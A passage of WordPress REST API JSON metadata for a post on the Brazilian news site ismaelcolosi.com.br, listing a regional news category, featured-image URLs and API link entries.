Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/inter-de-bebedouro_2024-11-07_20-51-45_jpg_2024-11-07_20-51-45.webp.webp?fit=1079%2C797&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/inter-de-bebedouro_2024-11-07_20-51-45_jpg_2024-11-07_20-51-45.webp.webp?fit=1079%2C797&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/inter-de-bebedouro_2024-11-07_20-51-45_jpg_2024-11-07_20-51-45.webp.webp?fit=1079%2C797&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/inter-de-bebedouro_2024-11-07_20-51-45_jpg_2024-11-07_20-51-45.webp.webp?fit=1079%2C797&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/inter-de-bebedouro_2024-11-07_20-51-45_jpg_2024-11-07_20-51-45.webp.webp?fit=1079%2C797&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pfMlyK-jsG","_links":{"self":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts\/74814","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=74814"}],"version-history":[{"count":0,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts\/74814\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/media\/70150"}],"wp:attachment":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=74814"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=74814"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=74814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}